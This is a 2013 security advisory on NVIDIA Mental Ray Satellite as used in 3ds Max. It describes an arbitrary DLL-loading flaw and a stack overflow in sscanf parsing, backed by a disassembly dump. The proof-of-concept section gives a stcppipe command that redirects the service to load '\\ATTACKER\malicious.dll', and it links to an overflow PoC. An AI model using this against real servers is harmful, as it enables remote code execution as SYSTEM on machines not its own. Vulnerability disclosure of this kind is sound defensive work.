######################################################################

Product         NVIDIA Mental Ray Distributed Bucket Rendering
                    used in Autodesk software like 3ds Max and Maya
                http://www.nvidia.com/object/nvidia-mental-ray.html
Versions        <= 3.11.1.10
Platforms       Windows, possibly Linux too
Vulnerability   A] arbitrary dll loading
                B] stack-based buffer-overflow
Attack surface  remote
Protocol        custom on port 7517 (Windows 3ds Max)
Date            25 Jan 2013 - found
                10 Dec 2013 - paper released
Author          Luigi Auriemma


#######################################################################

============
Introduction
============


Mental Ray is a rendering engine owned by NVIDIA and used for the
production of high quality movies and animations.
Its satellite version adopted in distributed rendering (render farms)
is also available as plugin in Autodesk software like 3ds Max as a
SYSTEM service automatically started at runtime.

On Windows raysat_3dsmax2014_64server.exe listens on the TCP port and
raysat_3dsmax2014_64.exe is spawned for each incoming connection.

Depending by the version the service may also have names like
raysat_3dsmax2013_32server.exe and raysat_3dsmax2013_32.exe, and so on.

Notes:
- SYSTEM service
- DEP and ASLR supported
- the new process for each connection allows endless exploit tentatives


#######################################################################

=============
Vulnerability
=============


Please note that these vulnerabilities have been discussed in the
following paper:

  https://revuln.com/files/ReVuln_Nvidia_mental_ray.pdf

This security advisory is only a personal note with information about
how to test the issues.


------------------------
A] Arbitrary dll loading
------------------------

Mental Ray Satellite allows the client to specify the shaders to load
for performing the rendering.
A shader is just a dll residing on the server, an attacker can choose
what arbitrary
libraries to load on the remote host because it's possible to specify
any arbitrary path include UNC ones like \\server\folder\file.dll.


------------------------------
B] Stack-based buffer-overflow
------------------------------

The first part of the protocol used by the Mental Ray Satellite is
composed by a 4 bytes signature followed by 7 numbers and a string that
contains the version of the remote host.

The parsing of these parameters is performed through the usage of
sscanf without a size limiter for the handling of the string one which
is placed in a small buffer located on the stack.

The following is a dump from raysat_3dsmax2013_32.exe 3.10.1.4:

    0040C2C0  /$  55                 PUSH EBP                   ; raysat_3dsmax2013_32.0040C2C0(guessed Arg1)
    0040C2C1  |.  8BEC               MOV EBP,ESP
    0040C2C3  |.  83E4 F8            AND ESP,FFFFFFF8           ; QWORD (8.-byte) stack alignment
    0040C2C6  |.  6A FF              PUSH -1
    0040C2C8  |.  68 CDAFE500        PUSH 00E5AFCD              ; Entry point
    0040C2CD  |.  64:A1 00000000     MOV EAX,DWORD PTR FS:[0]
    0040C2D3  |.  50                 PUSH EAX
    0040C2D4  |.  64:8925 00000000   MOV DWORD PTR FS:[0],ESP   ; SE handler
    0040C2DB  |.  81EC 38050000      SUB ESP,538
    ...
    0040CAC8  |>  8D9424 C0040000    LEA EDX,[ESP+4C0]
    0040CACF  |.  52                 PUSH EDX
    0040CAD0  |.  8D4424 40          LEA EAX,[ESP+40]
    0040CAD4  |.  50                 PUSH EAX
    0040CAD5  |.  8D4C24 34          LEA ECX,[ESP+34]
    0040CAD9  |.  51                 PUSH ECX
    0040CADA  |.  8B0CBD 60782001    MOV ECX,DWORD PTR DS:[EDI*4+1207860]
    0040CAE1  |.  8D5424 44          LEA EDX,[ESP+44]
    0040CAE5  |.  52                 PUSH EDX
    0040CAE6  |.  8D4424 40          LEA EAX,[ESP+40]
    0040CAEA  |.  50                 PUSH EAX
    0040CAEB  |.  83C1 0C            ADD ECX,0C
    0040CAEE  |.  51                 PUSH ECX
    0040CAEF  |.  8D5424 34          LEA EDX,[ESP+34]
    0040CAF3  |.  52                 PUSH EDX
    0040CAF4  |.  8D4424 3C          LEA EAX,[ESP+3C]
    0040CAF8  |.  50                 PUSH EAX
    0040CAF9  |.  8D4C24 64          LEA ECX,[ESP+64]
    0040CAFD  |.  68 54FBEB00        PUSH OFFSET 00EBFB54       ; ASCII "%05d %05d %05d %05d %05d %05d %05d %s"
    0040CB02  |.  51                 PUSH ECX
    0040CB03  |.  FF15 1494EB00      CALL DWORD PTR DS:[<&MSVCR100.sscanf>]


#######################################################################

================
Proof-of-Concept
================

A]

A quick example for testing the bug using 3ds Max or other clients, the
connection will pass through the stcppipe tool that will replace the
original DLL name with the new one residing on the attacker's computer:

- download and run the following tool:
  http://aluigi.org/mytoolz/stcppipe.zip

    stcppipe -s "base.dll" "\\ATTACKER\malicious.dll" SERVER 7517 1234

  where SERVER is the hostname or IP of the target and ATTACKER is the
  host reachable via SMB protocol or WebDav (your computer).

- select the following option from the 3ds Max menu:
    Rendering ->
        Render Setup ->
            Processing ->
                Distributed Bucket Rendering

- activate "Distributed Render"

- click on "Add" and insert Port 1234 and IP 127.0.0.1


B]

  http://aluigi.org/poc/raysat_bof.zip


#######################################################################